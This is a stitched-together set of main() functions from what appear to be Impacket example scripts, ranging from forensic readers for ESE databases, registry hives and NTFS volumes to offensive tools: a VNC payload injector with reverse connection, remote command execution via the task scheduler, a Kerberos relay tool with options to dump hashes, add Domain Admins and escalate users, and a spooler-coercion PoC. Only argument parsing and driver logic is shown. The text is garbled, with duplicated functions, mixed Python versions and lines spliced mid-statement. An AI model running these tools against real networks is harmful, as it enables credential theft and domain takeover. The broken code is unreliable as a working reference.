def main():
print(version.BANNER)
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser(add_help = True, description = "Extensive Storage Engine utility. Allows dumping "
"catalog, pages and tables.")
parser.add_argument('databaseFile', action='store', help='ESE to open')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-page', action='store', help='page to open')
subparsers = parser.add_subparsers(help='actions', dest='action')
# dump page
dump_parser = subparsers.add_parser('dump', help='dumps an specific page')
dump_parser.add_argument('-page', action='store', required=True, help='page to dump')
# info page
subparsers.add_parser('info', help='dumps the catalog info for the DB')
# export page
export_parser = subparsers.add_parser('export', help='dumps the catalog info for the DB')
export_parser.add_argument('-table', action='store', required=True, help='table to dump')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
ese = ESENT_DB(options.databaseFile)
try:
if options.action.upper() == 'INFO':
ese.printCatalog()
elif options.action.upper() == 'DUMP':
dumpPage(ese, int(options.page))
elif options.action.upper() == 'EXPORT':
exportTable(ese, options.table)
else:
raise Exception('Unknown action %s ' % options.action)
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
print(e)
ese.close()
def main():
# Init the example's logger theme
logger.init()
print version.BANNER
parser = argparse.ArgumentParser(add_help = True, description = "Reads data from registry hives.")
parser.add_argument('hive', action='store', help='registry hive to open')
subparsers = parser.add_subparsers(help='actions', dest='action')
# A enum_key command
enumkey_parser = subparsers.add_parser('enum_key', help='enumerates the subkeys of the specified open registry key')
enumkey_parser.add_argument('-name', action='store', required=True, help='registry key')
enumkey_parser.add_argument('-recursive', dest='recursive', action='store_true', required=False, help='recursive search (default False)')
# A enum_values command
enumvalues_parser = subparsers.add_parser('enum_values', help='enumerates the values for the specified open registry key')
enumvalues_parser.add_argument('-name', action='store', required=True, help='registry key')
# A get_value command
getvalue_parser = subparsers.add_parser('get_value', help='retrieves the data for the specified registry value')
getvalue_parser.add_argument('-name', action='store', required=True, help='registry value')
# A get_class command
getclass_parser = subparsers.add_parser('get_class', help='retrieves the data for the specified registry class')
getclass_parser.add_argument('-name', action='store', required=True, help='registry class name')
# A walk command
walk_parser = subparsers.add_parser('walk', help='walks the registry from the name node down')
walk_parser.add_argument('-name', action='store', required=True, help='registry class name to start walking down from')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
reg = winregistry.Registry(options.hive)
if options.action.upper() == 'ENUM_KEY':
print "[%s]" % options.name
enumKey(reg, options.name, options.recursive)
elif options.action.upper() == 'ENUM_VALUES':
enumValues(reg, options.name)
elif options.action.upper() == 'GET_VALUE':
getValue(reg, options.name)
elif options.action.upper() == 'GET_CLASS':
getClass(reg, options.name)
elif options.action.upper() == 'WALK':
walk(reg, options.name)
reg.close()
def main():
print version.BANNER
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser(add_help = True, description = "NTFS explorer (read-only)")
parser.add_argument('volume', action='store', help='NTFS volume to open (e.g. \\\\.\\C: or /dev/disk1s1)')
parser.add_argument('-extract', action='store', help='extracts pathname (e.g. \windows\system32\config\sam)')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
shell = MiniShell(options.volume)
if options.extract is not None:
shell.onecmd("get %s"% options.extract)
else:
shell.cmdloop()
def main():
tempdir = None
logger.init()
parser = argparse.ArgumentParser(add_help = True, description = "Inject VNC agent into active console session. Payload is delivered via SMB or HTTP.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-share', action='store', default = None, help='share where vnc batch file will be upload '
'(default - check for available writable shares )')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
vnc_group = parser.add_argument_group('vnc')
vnc_group.add_argument('-invoke-vnc-path', dest='invoke_vnc_path', default='Invoke-Vnc.ps1', action='store', help="Invoke-Vnc.ps1 filepath")
vnc_group.add_argument('-bc-ip', dest='bc_ip', required=False, action='store', help="IP with reverse VNC handler")
vnc_group.add_argument('-contype', dest='contype', required=True, action='store', help="Connection type. Either bind or reverse")
vnc_group.add_argument('-vncport', dest='vncport', required=True, action='store', help="Port for reverse/bind VNC connection")
vnc_group.add_argument('-vncpass', dest='vncpass', required=True, action='store', help="VNC password")
vnc_group.add_argument('-method', dest='method', required=False, default='upload', action='store', help="Payload delivery method. Either 'upload' or 'download'")
vnc_group.add_argument('-httpport', dest='httpport', required=False, default='80', action='store', help="HTTP server port to download payload from")
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter')
group.add_argument('-A', action="store", metavar = "authfile", help="smbclient/mount.cifs-style authentication file. ")
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
try:
if options.A is not None:
(domain, username, password) = load_smbclient_auth_file(options.A)
logging.debug('loaded smbclient auth file: domain=%s, username=%s, password=%s' % (repr(domain), repr(username), repr(password)))
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"/Invoke-Vnc.ps1", 'wb') as f:
f.write(open(options.invoke_vnc_path, 'rb').read())
f.close()
os.chdir(tempdir)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
logging.info("Serving payload at HTTP port " + str(PORT))
httpthread = threading.Thread(target=httpd.serve_forever)
httpthread.daemon = True
httpthread.start()
elif options.method == 'upload':
pass
else:
logging.critical("Unknown delivery method specified")
sys.exit(1)
executer = VNCEXEC(username, password, domain, options.hashes, options.aesKey,
options.share, options.k, options.dc_ip)
executer.run(address, options.method, options.bc_ip, options.contype, options.vncpass, options.vncport, options.invoke_vnc_path, options.httpport)
except (Exception, KeyboardInterrupt), e:
#import traceback
#print traceback.print_exc()
logging.error(str(e))
os.unlink(tempdir + '/' + 'Invoke-Vnc.ps1')
os.rmdir(tempdir)
if options.method=='download' and tempdir is not None:
delete_temp_file(tempdir, tempdir + '/' + 'Invoke-Vnc.ps1')
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-f','--command-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-v', '--verbose', action='count', default=0, help='Verbosity (can be stacked)')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
help='Destination port to connect to SMB Server')
args = parser.parse_args()
if args.verbose == 0:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.DEBUG)
print(args)
creds = SMBCredential.from_args(args)
print(str(creds))
target = SMBTarget.from_args(args)
print(str(target))
print(repr(target.get_hostname()))
print(target.get_addr()[0])
try:
smb_client = SMBConnection(target, sess_port=target.port)
smb_client.login(creds)
shell = MiniImpacketShell(smb_client)
if args.command_file is not None:
logging.info("Executing commands from %s" % args.command_file.name)
for line in args.command_file.readlines():
if line[0] != '#':
print("# %s" % line,
shell.onecmd(line))
else:
print (line,)
else:
shell.cmdloop()
except Exception as e:
logging.exception('Exception in main')
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print("# %s" % line, end=' ')
shell.onecmd(line)
else:
print(line, end=' ')
else:
shell.cmdloop()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port",
help='Destination port to connect to SMB Server')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(
options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print("# %s" % line, end=' ')
shell.onecmd(line)
else:
print(line, end=' ')
else:
shell.cmdloop()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(str(e))
def main():
global CODEC
print(version.BANNER)
parser = argparse.ArgumentParser()
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('port', action='store', type=int, help='TSCH RPC endpoint port number (usually 49154)')
parser.add_argument('command', action='store', nargs='*', default=' ', help='command to execute at the target ')
parser.add_argument('-session-id', action='store', type=int, help='an existed logon session to use (no output, no cmd.exe)')
parser.add_argument('-ts', action='store_true', help='adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default "%s"). If errors are detected, run chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec ' % CODEC)
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
group.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.codec is not None:
CODEC = options.codec
else:
if CODEC is None:
CODEC = 'utf-8'
logging.warning("This will work ONLY on Windows >= Vista")
if ''.join(options.command) == ' ':
logging.error('You need to specify a command to execute!')
sys.exit(1)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password, address = re.compile('(?:(?:([^\/@:]*)\/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(options.target).groups('')
#In case the password contains '@'
if '@' in address:
password = password + '@' + address.rpartition('@')[0]
address = address.rpartition('@')[2]
if options.port <= 0 or options.port >= 65536:
logging.error("Invalid port number: %i" % (options.port))
return
if domain is None:
domain = ''
if options.keytab is not None:
Keytab.loadKeysFromKeytab (options.keytab, username, domain, options)
options.k = True
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
atsvc_exec = TSCH_EXEC(username, password, domain, options.hashes, options.aesKey, options.k, options.dc_ip, ' '.join(options.command), options.session_id)
atsvc_exec.play(address, options.port)
action="store",
metavar="hex key",
help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-keytab',
action="store",
help='Read keys for SPN from keytab file')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.codec is not None:
CODEC = options.codec
else:
if CODEC is None:
CODEC = 'utf-8'
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
import re
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('-file', type=argparse.FileType('r'), help='input file with commands to execute in the mini shell')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group = parser.add_argument_group('connection')
group.add_argument('-dc-ip', action='store', metavar="ip address",
help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in '
'the target parameter')
group.add_argument('-target-ip', action='store', metavar="ip address",
help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
'This is useful when target is the NetBIOS name and you cannot resolve it')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
domain, username, password, address = parse_target(options.target)
if options.target_ip is None:
options.target_ip = address
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:"******"Executing commands from %s" % options.file.name)
for line in options.file.readlines():
if line[0] != '#':
print("# %s" % line, end=' ')
shell.onecmd(line)
else:
print(line, end=' ')
else:
shell.cmdloop()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
def main():
print version.BANNER
# Init the example's logger theme
logger.init()
parser = argparse.ArgumentParser(
add_help=True,
description="Extensive Storage Engine utility. Allows dumping "
"catalog, pages and tables.")
parser.add_argument('databaseFile', action='store', help='ESE to open')
parser.add_argument('-debug',
action='store_true',
help='Turn DEBUG output ON')
parser.add_argument('-page', action='store', help='page to open')
subparsers = parser.add_subparsers(help='actions', dest='action')
# dump page
dump_parser = subparsers.add_parser('dump', help='dumps an specific page')
dump_parser.add_argument('-page',
action='store',
required=True,
help='page to dump')
# info page
subparsers.add_parser('info', help='dumps the catalog info for the DB')
# export page
export_parser = subparsers.add_parser(
'export', help='dumps the catalog info for the DB')
export_parser.add_argument('-table',
action='store',
required=True,
help='table to dump')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
ese = ESENT_DB(options.databaseFile)
try:
if options.action.upper() == 'INFO':
ese.printCatalog()
elif options.action.upper() == 'DUMP':
dumpPage(ese, int(options.page))
elif options.action.upper() == 'EXPORT':
exportTable(ese, options.table)
else:
logging.error('Unknown action %s ' % options.action)
raise
except Exception, e:
#import traceback
#print traceback.print_exc()
print e
def main(args):
# Init the example's logger theme
logger.init()
if len(args) != 2:
print "usage: ./ifmap.py <host> <port>"
return 1
host = args[0]
port = int(args[1])
stringbinding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(stringbinding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()
dce.bind(mgmt.MSRPC_UUID_MGMT)
ifids = mgmt.hinq_if_ids(dce)
uuidtups = set(
uuid.bin_to_uuidtup(ifids['if_id_vector']['if_id'][index]
['Data'].getData())
for index in range(ifids['if_id_vector']['count']))
dce.disconnect()
probes = uuidtups | uuid_database
for tup in sorted(probes):
dce.connect()
binuuid = uuid.uuidtup_to_bin(tup)
try:
dce.bind(binuuid)
except rpcrt.DCERPCException, e:
if str(e).find('abstract_syntax_not_supported') >= 0:
listening = False
else:
raise
else:
listening = True
listed = tup in uuidtups
otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups)
if listed or listening:
print "%r: %s, %s" % (
tup, "listed" if listed else
"other version listed" if otherversion else "not listed",
"listening" if listening else "not listening")
if epm.KNOWN_PROTOCOLS.has_key(tup[0]):
print "Protocol: %s" % (epm.KNOWN_PROTOCOLS[tup[0]])
else:
print "Procotol: N/A"
if KNOWN_UUIDS.has_key(uuid.uuidtup_to_bin(tup)[:18]):
print "Provider: %s" % (
KNOWN_UUIDS[uuid.uuidtup_to_bin(tup)[:18]])
else:
print "Provider: N/A"
def main():
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = KrbRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
try:
c.setLDAPOptions(options.no_dump, options.no_da,
options.no_acl, options.escalate_user)
except TypeError:
# Newer version of ntlmrelayx has extra arguments
c.setLDAPOptions(options.no_dump, options.no_da,
options.no_acl, options.no_validate_privs,
options.escalate_user)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(not options.no_smb2support)
c.setInterfaceIp(options.interface_ip)
if options.krbhexpass and not options.krbpass:
c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip,
binascii.unhexlify(options.krbhexpass),
options.krbsalt, True)
else:
c.setAuthOptions(options.aesKey, options.hashes, options.dc_ip,
options.krbpass, options.krbsalt, False)
c.setKrbOptions(options.format)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPKrbRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
s = server(c)
s.start()
threads.add(s)
return c
# Init the example's logger theme
logger.init()
#Parse arguments
parser = argparse.ArgumentParser(
add_help=False,
description=
"Kerberos \"relay\" tool. Abuses accounts with unconstrained "
"delegation to pwn things.")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h",
"--help",
action="help",
help='show this help message and exit')
parser.add_argument('-debug',
action='store_true',
help='Turn DEBUG output ON')
parser.add_argument(
'-t',
"--target",
action='store',
metavar='TARGET',
help='Target to attack, '
'since this is Kerberos, only HOSTNAMES are valid. Example: smb://server:445 If unspecified, will store tickets for later use.'
)
parser.add_argument('-tf',
action='store',
metavar='TARGETSFILE',
help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument(
'-w',
action='store_true',
help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
# Interface address specification
parser.add_argument('-ip',
'--interface-ip',
action='store',
metavar='INTERFACE_IP',
help='IP address of interface to '
'bind SMB and HTTP servers',
default='')
parser.add_argument(
'-r',
action='store',
metavar='SMBSERVER',
help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument(
'-l',
'--lootdir',
action='store',
type=str,
required=False,
metavar='LOOTDIR',
default='.',
help='Loot '
'directory in which gathered loot (TGTs or dumps) will be stored (default: current directory).'
)
parser.add_argument(
'-f',
'--format',
default='ccache',
choices=['ccache', 'kirbi'],
action='store',
help='Format to store tickets in. Valid: ccache (Impacket) or kirbi'
' (Mimikatz format) default: ccache')
parser.add_argument(
'-codec',
action='store',
help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' %
sys.getdefaultencoding())
parser.add_argument('-no-smb2support',
action="store_false",
default=False,
help='Disable SMB2 Support')
parser.add_argument(
'-wh',
'--wpad-host',
action='store',
help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument(
'-wa',
'--wpad-auth-num',
action='store',
help=
'Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file.')
parser.add_argument('-6',
'--ipv6',
action='store_true',
help='Listen on both IPv6 and IPv4')
# Authentication arguments
group = parser.add_argument_group(
'Kerberos Keys (of your account with unconstrained delegation)')
group.add_argument('-p',
'--krbpass',
action="store",
metavar="PASSWORD",
help='Account password')
group.add_argument('-hp',
'--krbhexpass',
action="store",
metavar="HEXPASSWORD",
help='Hex-encoded password')
group.add_argument(
'-s',
'--krbsalt',
action="store",
metavar="USERNAME",
help='Case sensitive (!) salt. Used to calculate Kerberos keys.'
'Only required if specifying password instead of keys.')
group.add_argument('-hashes',
action="store",
metavar="LMHASH:NTHASH",
help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-aesKey',
action="store",
metavar="hex key",
help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument(
'-dc-ip',
action='store',
metavar="ip address",
help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) specified in the target parameter'
)
#SMB arguments
smboptions = parser.add_argument_group("SMB attack options")
smboptions.add_argument(
'-e',
action='store',
required=False,
metavar='FILE',
help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)'
)
smboptions.add_argument(
'-c',
action='store',
type=str,
required=False,
metavar='COMMAND',
help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
smboptions.add_argument(
'--enum-local-admins',
action='store_true',
required=False,
help=
'If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)'
)
#LDAP options
ldapoptions = parser.add_argument_group("LDAP attack options")
ldapoptions.add_argument('--no-dump',
action='store_false',
required=False,
help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da',
action='store_false',
required=False,
help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl',
action='store_false',
required=False,
help='Disable ACL attacks')
ldapoptions.add_argument(
'--no-validate-privs',
action='store_false',
required=False,
help=
'Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks'
)
ldapoptions.add_argument(
'--escalate-user',
action='store',
required=False,
help='Escalate privileges of this user instead of creating a new one')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from lib.clients import PROTOCOL_CLIENTS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in attack mode to single host")
mode = 'ATTACK'
targetSystem = TargetsProcessor(singleTarget=options.target,
protocolClients=PROTOCOL_CLIENTS)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in attack mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf,
protocolClients=PROTOCOL_CLIENTS)
mode = 'ATTACK'
else:
logging.info(
"Running in export mode (all tickets will be saved to disk)")
targetSystem = None
mode = 'EXPORT'
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
c = start_servers(options, threads)
print ""
logging.info("Servers started, waiting for connections")
try:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
for s in threads:
del s
sys.exit(0)
def main():
# globals
global target
global listener
global debug
global show_banner
logger.init()
parser = argparse.ArgumentParser(
add_help=True,
description=
"dementor - rough PoC to connect to spoolss to elicit machine account authentication (implementation by @3xocyte, idea/discovery by @tifkin_, rediscovery and code fixes by @elad_shamir)"
)
parser.add_argument('-u',
'--username',
action="store",
default='',
help='valid username')
parser.add_argument('-p',
'--password',
action="store",
default='',
help='valid password')
parser.add_argument('-d',
'--domain',
action="store",
default='',
help='valid domain name')
parser.add_argument('--ntlm', action="store", default='', help='nt hash')
parser.add_argument('--server',
action='store_true',
default=False,
help='create smb listener')
parser.add_argument('--debug',
action="store_true",
default=False,
help='enable debugging')
parser.add_argument('-q',
'--banner',
action="store_true",
default=False,
help='show banner')
parser.add_argument('listener', help='ip address or hostname of listener')
parser.add_argument('target', help='ip address or hostname of target')
options = parser.parse_args()
domain = options.domain
username = options.username
password = options.password
ntlm = options.ntlm
server = options.server
listener = options.listener
target = options.target
debug = options.debug
banner = options.banner
if banner is True:
print(show_banner)
if server is True:
logging.info("starting smb server...")
server_thread = SMBServer()
server_thread.daemon = True
server_thread.start()
sleep(1) # ensure server starts before continuing
logging.info("server running")
dce = create_connection(domain, username, password, ntlm)
handle = call_open_printer(dce)
grab_hash(dce, handle, listener)
logging.info("done!")
dce.disconnect()
sys.exit()
def main():
# Init the example's logger theme
logger.init()
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "SMB client implementation.")
